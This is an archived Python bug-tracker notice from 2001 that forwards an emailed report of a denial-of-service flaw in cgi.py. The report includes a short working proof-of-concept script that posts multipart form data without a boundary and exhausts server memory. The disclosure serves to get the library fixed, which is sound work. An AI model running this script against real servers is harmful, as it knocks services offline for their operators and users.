[Python-bugs-list] [ python-Bugs-443120 ] denial-of-service attack to cgi.py
noreply@sourceforge.net
noreply@sourceforge.net
Fri, 20 Jul 2001 09:13:58 -0700
Bugs item #443120, was opened at 2001-07-20 09:13
You can respond by visiting:
http://sourceforge.net/tracker/?func=detail&atid=105470&aid=443120&group_id=5470
Category: Python Library
Group: None
Status: Open
Resolution: None
Priority: 5
Submitted By: Guido van Rossum (gvanrossum)
Assigned to: Nobody/Anonymous (nobody)
Summary: denial-of-service attack to cgi.py
Initial Comment:
I got this in the mail:
"""
Subject: Bug in cgi.py, denial-of-service possible
From: Richard Jones <richard@bizarsoftware.com.au>
To: guido@python.org, support@digicool.com
Date: Fri, 20 Jul 2001 17:43:15 +1000
The inner workings of cgi.py are still a mystery to me,
so I can't offer a
patch. Sorry.
The following code will effect a denial-of-service
against any server running
cgi.py (and hence Zope).
import httplib
params = '\n'*10
h = httplib.HTTP('localhost', 8080)
h.putrequest('POST', '/')
h.putheader('Content-type', 'multipart/form-data')
h.putheader('Content-length', str(len(params)))
h.endheaders()
h.send(params)
The key here is the missing boundary from the
content-type header. From my
observation, it seems that cgi.py defaults the boundary
to "" which means
that it matches boundaries without progressing through
the input - creating
new FieldStorage instances for each match. The result
is all available RAM
gobbled up eventually. I recommend testing this on a
system on which you can
easily kill the server process.
Richard
--
Richard Jones
richard@bizarsoftware.com.au
Senior Software Developer, Bizar Software
(www.bizarsoftware.com.au)
"""
----------------------------------------------------------------------
You can respond by visiting:
http://sourceforge.net/tracker/?func=detail&atid=105470&aid=443120&group_id=5470